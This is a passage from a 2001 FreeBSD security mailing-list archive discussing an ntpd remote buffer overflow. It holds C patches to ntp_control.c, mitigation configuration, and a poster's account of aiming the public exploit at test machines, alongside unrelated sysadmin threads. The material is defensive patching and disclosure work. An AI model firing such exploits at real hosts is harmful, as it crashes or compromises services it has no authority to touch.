%d.%d.%d.%d:%d (possibly spoofed)\n", + (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, + (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, + (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, + (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, + ntohs(rmt_addr->sin_port) + ); + + return (0); + } + } Probably won't make a difference to most. --Dave Lo and behold, Poul-Henning Kamp once said: > > In message <20010404191626.A6071@ns2.airlinksys.com>, Scott Johnson writes: > >Quoth Poul-Henning Kamp on Thu, Apr 05, 2001 at 01:55:57AM +0200: > >> > >> This has already been fixed in FreeBSD current & stable an hour > >> ago or so. > >> > >> Poul-Henning > > > >Is a patch coming for 4.2-RELEASE? Will we just have to install the port > >over our system binaries, like we did with bind? In that case, it appears > >that just setting PREFIX=/usr won't do to overwrite the system version, > >since the port puts its binaries in ${PREFIX}/bin. > > The patch should apply to pretty much any version of (x)ntpd so please > help yourself while I get some sleep. > > The patch is here: > > http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control.c.diff?r1=1.1&r2=1.2 > > -- > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 > phk@FreeBSD.ORG | TCP/IP since RFC 956 > FreeBSD committer | BSD since 4.3-tahoe > Never attribute to malice what can adequately be explained by incompetence. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:30:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 256F337B446 for ; Wed, 4 Apr 2001 17:30:34 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA10599; Wed, 4 Apr 2001 18:30:10 -0600 (MDT) Message-Id: <4.3.2.7.2.20010404181852.04445ed0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 04 Apr 2001 18:30:07 -0600 To: Poul-Henning Kamp From: Brett Glass Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow Cc: Michael Bryan , freebsd-security@FreeBSD.ORG In-Reply-To: <52942.986429811@critter> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:16 PM 4/4/2001, Poul-Henning Kamp wrote: >And it has a lot worse performance, but let's not get into that... You're right, actually; it has worse performance if you're updating your clocks frequently. If you're checking once a day (we just do it as routine maintenance along with the nightly automated backup), it's probably more efficient. The point is that it's something you can put in right away until you patch or upgrade to 4.3-RELEASE. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 18:57: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 8614A37B496 for ; Wed, 4 Apr 2001 18:57:05 -0700 (PDT) (envelope-from dlacroix@cowpie.acm.vt.edu) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.11.3/8.11.3) id f351uiq20419; Wed, 4 Apr 2001 21:56:44 -0400 (EDT) (envelope-from dlacroix) From: David La Croix Message-Id: <200104050156.f351uiq20419@cowpie.acm.vt.edu> Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow To: fbsd-secure@ursine.com (Michael Bryan) Date: Wed, 4 Apr 2001 20:56:44 -0500 (CDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Michael Bryan" at Apr 04, 2001 04:46:43 PM X-Mailer: ELM [version 2.5 PL5] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Heads up. This just came across BugTraq, will likely affect FreeBSD. > As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > Haven't seen anybody mention this yet.... (and I hate to admit to still using 3.x) I have a production box which I haven't upgraded yet... Is the version of xntpd in 3.x-STABLE (xntpdc version=3.4e) succeptable to this, or any other, known buffer overflows? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 19: 9: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 1190A37B443 for ; Wed, 4 Apr 2001 19:09:07 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBARAN00.D93; Wed, 4 Apr 2001 19:08:47 -0700 Message-ID: <3ACBD3BF.52BF23E6@globalstar.com> Date: Wed, 04 Apr 2001 19:09:03 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: David La Croix Cc: Michael Bryan , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow References: <200104050156.f351uiq20419@cowpie.acm.vt.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David La Croix wrote: > > > > > > > Heads up. This just came across BugTraq, will likely affect FreeBSD. > > As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > > > > > Haven't seen anybody mention this yet.... (and I hate to admit to > still using 3.x) I have a production box which I haven't upgraded yet... > > Is the version of xntpd in 3.x-STABLE (xntpdc version=3.4e) > succeptable to this, or any other, known buffer overflows? Test it. If you compile the code and shoot, it will crash the daemon even if the exploit is not successful. But that tells you the potential is there. I took that FreeBSD and Linux exploit and aimed it at Sparc box running xntpd 3.4y and *CRASH*. The xntpd cored and died. The buffer overrun looks like it goes back at least that far. It should not be too hard to track it to the source. But I am too busy trying to assess how to handle all the machines I _know_ are vulnerable to do that. The idea that something like the NTP built in to Cisco's IOS might be based off of vulnerable [x]ntpd code frankly scares the beejeezus out of me. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 20:11:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id C5D2237B423 for ; Wed, 4 Apr 2001 20:11:13 -0700 (PDT) (envelope-from marquis@roble.com) Received: from localhost (marquis@localhost) by roble.com with ESMTP id f353BDe04809 for ; Wed, 4 Apr 2001 20:11:13 -0700 (PDT) Date: Wed, 4 Apr 2001 20:11:13 -0700 (PDT) From: Roger Marquis To: security@FreeBSD.ORG Subject: http://www.freebsd.org/security being maintained? (ntpd/ftpd/...) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is anyone maintaining http://www.freebsd.org/security/? I ask because it hasn't been updated in over a month and contains no information on the ntpd or ftpd vulnerabilities. -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 20:15:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 0BF6137B423 for ; Wed, 4 Apr 2001 20:15:29 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f353ENT37642; Thu, 5 Apr 2001 13:14:24 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104050314.f353ENT37642@drugs.dv.isc.org> To: "Crist Clark" Cc: David La Croix , Michael Bryan , freebsd-security@FreeBSD.ORG From: Mark.Andrews@nominum.com Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-reply-to: Your message of "Wed, 04 Apr 2001 19:09:03 MST." <3ACBD3BF.52BF23E6@globalstar.com> Date: Thu, 05 Apr 2001 13:14:23 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following stomps this particular overflow. Mark Index: contrib/ntp/ntpd/ntp_control.c =================================================================== RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 ntp_control.c --- contrib/ntp/ntpd/ntp_control.c 2000/01/28 14:53:03 1.1.1.2 +++ contrib/ntp/ntpd/ntp_control.c 2001/04/05 03:07:25 @@ -1650,11 +1650,15 @@ while (cp < reqend && isspace((int)*cp)) cp++; while (cp < reqend && *cp != ',') + if (tp - buf < sizeof(buf) - 1) *tp++ = *cp++; + else + cp++; if (cp < reqend) cp++; *tp = '\0'; - while (isspace((int)(*(tp-1)))) + while (tp != buf && + isspace((int)(*(tp-1)))) *(--tp) = '\0'; reqpt = cp; *data = buf; > David La Croix wrote: > > > > > > > > > > > Heads up. This just came across BugTraq, will likely affect FreeBSD. > > > As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > > > > > > > > > Haven't seen anybody mention this yet.... (and I hate to admit to > > still using 3.x) I have a production box which I haven't upgraded yet... > > > > Is the version of xntpd in 3.x-STABLE (xntpdc version=3.4e) > > succeptable to this, or any other, known buffer overflows? > > Test it. If you compile the code and shoot, it will crash the daemon > even if the exploit is not successful. But that tells you the potential > is there. > > I took that FreeBSD and Linux exploit and aimed it at Sparc box running > xntpd 3.4y and *CRASH*. The xntpd cored and died. The buffer overrun > looks like it goes back at least that far. It should not be too hard > to track it to the source. But I am too busy trying to assess how to > handle all the machines I _know_ are vulnerable to do that. > > The idea that something like the NTP built in to Cisco's IOS might be > based off of vulnerable [x]ntpd code frankly scares the beejeezus out > of me. > -- > Crist J. Clark Network Security Engineer > crist.clark@globalstar.com Globalstar, L.P. > (408) 933-4387 FAX: (408) 933-4926 > > The information contained in this e-mail message is confidential, > intended only for the use of the individual or entity named above. If > the reader of this e-mail is not the intended recipient, or the employee > or agent responsible to deliver it to the intended recipient, you are > hereby notified that any review, dissemination, distribution or copying > of this communication is strictly prohibited. If you have received this > e-mail in error, please contact postmaster@globalstar.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 21:41:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from grok.example.net (a0g1355ly34tj.bc.hsia.telus.net [216.232.252.235]) by hub.freebsd.org (Postfix) with ESMTP id EB1F837B42C for ; Wed, 4 Apr 2001 21:41:21 -0700 (PDT) (envelope-from sreid@sea-to-sky.net) Received: by grok.example.net (Postfix, from userid 1000) id 02F2A21334A; Wed, 4 Apr 2001 21:41:20 -0700 (PDT) Date: Wed, 4 Apr 2001 21:41:20 -0700 From: Steve Reid To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow Message-ID: <20010404214120.B22906@grok.bc.hsia.telus.net> References: <3ACBB263.2804E9C2@ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <3ACBB263.2804E9C2@ursine.com>; from Michael Bryan on Wed, Apr 04, 2001 at 04:46:43PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 04, 2001 at 04:46:43PM -0700, Michael Bryan wrote: > From: Przemyslaw Frasunek > Subject: ntpd =< 4.0.99k remote buffer overflow > To: BUGTRAQ@SECURITYFOCUS.COM > /* ntpd remote root exploit / babcia padlina ltd. */ I'm not an ntpd guru by any means, but I have this in my /etc/ntpd.conf: restrict 127.0.0.1 restrict default noquery nomodify notrap nopeer The exploit crashes my ntpd when run locally, but not when run remotely. Tcpdump confirms that the remote packets are arriving. I _think_ those restrict lines permit full access to localhost, but limit external stuff to ntp query responses. That should be suitable for the typical box that just wants to keep it's clock synchronized. It's probably possible to improve upon that configuration; I barely understood ntpd configuration when I created that ntpd.conf and have forgotten what little I did learn. It is possible to spoof 127.0.0.1 if you don't have a firewall blocking such bogons. I think excluding the "restrict 127.0.0.1" line should eliminate that hole. A proper patch should be applied of course, but I think this goes to show that tightening a configuration is generally good practice. This is especially true for network daemons that must run as root for their whole life, and especially true for network daemons that are as feature-rich (see the man page for details) as ntpd. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 22:44:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 272C037B50C; Wed, 4 Apr 2001 22:44:08 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (2288 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 5 Apr 2001 00:43:17 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Thu, 5 Apr 2001 00:43:17 -0500 (CDT) From: James Wyatt To: Kherry Zamore Cc: freebsd-stable@freebsd.org, freebsd-security@freebsd.org Subject: Re: su change? In-Reply-To: <005401c0bc63$7cb36650$0202a8c0@majorzoot> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Apr 2001, Kherry Zamore wrote: > Just recently my friend locked himself out of his machine by changing root's > shell to a nonexisting file. The only way he could become root again was by > rebooting the machine into single user mode and changing it from there. Now > while I know that its foolish to change root's shell in the first place, i > don't think this is an acceptable punishment for those that do. Your friend had a "root awakening", eh? Consider it a cheap lesson on: 1) Use chsh to change shells *always*. If not, use vipw at least. 2) sudo can be a handy beast. It helps forgotten root passwords too! 3) Playing with root's shell is dangerous and, I'm sorry, just stupid. If your new shell has shared libs on another filesystem that fails to mount, you are toast. (BillVer can attest to this from csh on the Tandy 6000.) Scripts should spec their shell, but you could still get caught there too. The csh v.s. sh debate is part of why 'toor' was created. sudo also gets around this by letting you use user's favorite shells. 4) Make a playground. Take some abandoned box and install an OS on it to "beat up". Do experimental or "crazy" things on *it* first. (At least you can't kill-off init anymore, you could on the VAX. (^_^)) This is a good idea for WinServers too, btw. Using Ghost(tm), you can bring your machine back from the dead in no time. Any experienced admin has plenty of tales (tightening access until telnet fails, live ifconfig-ing the WRONG ip, SMTP alias loops, forgetting Caps Lock was on in vi, etc...). I wouldn't hire an admin that didn't have some experience with damage control - you don't know how they will react. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 22:45:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 28E9837B506 for ; Wed, 4 Apr 2001 22:45:34 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f355jVT38066 for ; Thu, 5 Apr 2001 15:45:31 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104050545.f355jVT38066@drugs.dv.isc.org> To: freebsd-security@freebsd.org From: Mark.Andrews@nominum.com Subject: ntpd: committed fix still contains buffer overrun Date: Thu, 05 Apr 2001 15:45:31 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The is still buffer over and under runs and the previous fix introduces a DoS. Mark Index: ntp_control.c =================================================================== RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.1.1.2.2.1 diff -u -r1.1.1.2.2.1 ntp_control.c --- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 +++ ntp_control.c 2001/04/05 05:35:37 @@ -1656,22 +1656,14 @@ cp++; while (cp < reqend && *cp != ',') { *tp++ = *cp++; - if (tp > buf + sizeof(buf)) { - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n", - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, - ntohs(rmt_addr->sin_port) -); - + if (tp > buf + sizeof(buf) - 1) return (0); - } } if (cp < reqend) cp++; *tp = '\0'; - while (isspace((int)(*(tp-1)))) + while (tp != buf && + isspace((int)(*(tp-1)))) *(--tp) = '\0'; reqpt = cp; *data = buf; -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 6:25:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from bajoran.xsinet.co.za (bajoran.xsinet.co.za [196.25.196.73]) by hub.freebsd.org (Postfix) with SMTP id 37CDA37B505 for ; Thu, 5 Apr 2001 06:25:13 -0700 (PDT) (envelope-from patrick@xsinet.com) Received: (qmail 46583 invoked from network); 5 Apr 2001 13:37:19 -0000 Received: from unknown (HELO xsinet.com) (192.168.2.1) by 0 with SMTP; 5 Apr 2001 13:37:19 -0000 Message-ID: <3ACC73A4.A5F92299@xsinet.com> Date: Thu, 05 Apr 2001 15:31:17 +0200 From: Patrick Reply-To: patrick@xsinet.com Organization: XSInet X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.3-RC i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Subject: Apache 1.3.19 Bsd 4.3 RC Core Dump Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i have recently cvsuped a clean install to bsd 4.3 RC and then immidiatley i install apache 13-modssl out of the ports tree i attempt to run it and it automagically core dumps any ideas ?? Patrick ------------------------------------------------------------ Get your own free Internet access at http://www.xsinet.co.za/ ------------------------------------------------------------ Internet communications are not secure and therefore the XSInet does not accept legal responsibility for the contents of this message. Any views or opinions presented are solely those of the author and do not necessarily represent those of XSInet. The XSInet e-mail facility may not be used for the distribution of chain letters or offensive e-mail. XSInet hereby distances itself from and accepts no liability for the unauthorized use of its e-mail facility or the sending of e-mail communications for other than strictly business purposes. Every possible precaution has been taken to ensure that this message is virus free, however XSInet cannot be held responsible for any virus infection occurring as a result of this e-mail message. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 7: 1:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 1938D37B422 for ; Thu, 5 Apr 2001 07:01:38 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 25450 invoked by uid 1000); 5 Apr 2001 14:01:30 -0000 Date: Thu, 5 Apr 2001 10:01:30 -0400 From: Chris Johnson To: Patrick Cc: freebsd-security@FreeBSD.org Subject: Re: Apache 1.3.19 Bsd 4.3 RC Core Dump Message-ID: <20010405100130.A25353@palomine.net> References: <3ACC73A4.A5F92299@xsinet.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="7AUc2qLy4jB3hD7Z" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ACC73A4.A5F92299@xsinet.com>; from patrick@xsinet.com on Thu, Apr 05, 2001 at 03:31:17PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --7AUc2qLy4jB3hD7Z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Apr 05, 2001 at 03:31:17PM +0200, Patrick wrote: > i have recently cvsuped a clean install to bsd 4.3 RC and then > immidiatley i install apache 13-modssl out of the ports tree i attempt > to run it and it automagically core dumps any ideas ?? First, get a new keyboard; your shift and period keys are broken. Second, check the list archives. This has been discussed frequently and at great length. Chris --7AUc2qLy4jB3hD7Z Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6zHq5yeUEMvtGLWERAsbGAKChbZ6i9ftPY+5E4D4+NY/O0lC2uACg9T+g soH1liP3SEwjf7g21AYQzS8= =y1u4 -----END PGP SIGNATURE----- --7AUc2qLy4jB3hD7Z-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 7:18:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 2EE6037B496 for ; Thu, 5 Apr 2001 07:18:53 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f35EIlk98936; Thu, 5 Apr 2001 18:18:47 +0400 (MSD) (envelope-from ache) Date: Thu, 5 Apr 2001 18:18:45 +0400 From: "Andrey A. Chernov" To: Mark.Andrews@nominum.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntpd: committed fix still contains buffer overrun Message-ID: <20010405181844.A98479@nagual.pp.ru> References: <200104050545.f355jVT38066@drugs.dv.isc.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104050545.f355jVT38066@drugs.dv.isc.org>; from Mark.Andrews@nominum.com on Thu, Apr 05, 2001 at 03:45:31PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 05, 2001 at 15:45:31 +1000, Mark.Andrews@nominum.com wrote: > - while (isspace((int)(*(tp-1)))) > + while (tp != buf && > + isspace((int)(*(tp-1)))) I wonder how many different variants of wrong cast people use in that place: int, unsigned, etc. Proper cast is one: (unsigned char) Please, fix. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 8:13:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3478137B446; Thu, 5 Apr 2001 08:13:22 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA65794; Thu, 5 Apr 2001 17:13:17 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: James Wyatt Cc: Kherry Zamore , freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: su change? References: From: Dag-Erling Smorgrav Date: 05 Apr 2001 17:13:17 +0200 In-Reply-To: James Wyatt's message of "Thu, 5 Apr 2001 00:43:17 -0500 (CDT)" Message-ID: Lines: 9 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt writes: > Any experienced admin has plenty of tales (tightening access until telnet > fails I consider this (telnetd not working) a feature. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 9:41:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 615D637B509 for ; Thu, 5 Apr 2001 09:41:08 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [127.0.0.1] (helo=softweyr.com ident=65e84f8068ef6612eb03e1d92679fac4) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14kfZd-0000DO-00; Tue, 03 Apr 2001 23:11:17 -0600 Message-ID: <3ACAACF5.A29297E7@softweyr.com> Date: Tue, 03 Apr 2001 23:11:17 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Gerhard Sittig Cc: freebsd-security@freebsd.org Subject: Re: Something's happening with named References: <4630.010329@rostokgroup.com> <5.0.0.25.0.20010329195331.06d46eb0@mail.Go2France.com> <20010402025846.C75063@mail.webmonster.de> <20010402190426.H20830@speedy.gsinet> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gerhard Sittig wrote: > > Sorry, I lack English words. But in German "heikel" > ("troublesome"?) would be most appropriate. I'm sure the other > replies will tend to some "highly dangerous from the non > technical POV", too. :( Exactly. DJB's code is quite good for what it does, but changing it without his permission violates his license. That's his choice, and I intend to respect it, as I'm sure we all do. Offering djbdns/tinydns (unmodified, as the port/package builds it) as an option at or after installation is a fine idea, but I wouldn't want to replace bind with it due to the licensing inflexibility. I can also think of numerous not-so-large installations that may want to use features of bind that are not in djbdns, like Dynamic DNS. > We all should be glad that it's so easy to not run bind and > install djbdns from the ports instead. This makes it a > consious(sp?) decision by the admin. It's very much like running conscious > an MTA different from sendmail or running non main stream > software at all: You're free to do it but you have to take care > yourself ... This would be one of the goals of making FreeBSD installations more granular, being able to choose between multiple MTA configurations, multiple DNS server configurations, etc. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 11:10:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2B63A37B446; Thu, 5 Apr 2001 11:10:08 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (928 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 5 Apr 2001 13:08:57 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Thu, 5 Apr 2001 13:08:56 -0500 (CDT) From: James Wyatt To: Dag-Erling Smorgrav Cc: Kherry Zamore , freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: su change? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 5 Apr 2001, Dag-Erling Smorgrav wrote: > James Wyatt writes: > > Any experienced admin has plenty of tales (tightening access until telnet > > fails > > I consider this (telnetd not working) a feature. Not until you get sshd working! - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 14:52:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 31EC337B424; Thu, 5 Apr 2001 14:52:14 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id XAA67298; Thu, 5 Apr 2001 23:52:10 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: James Wyatt Cc: Kherry Zamore , 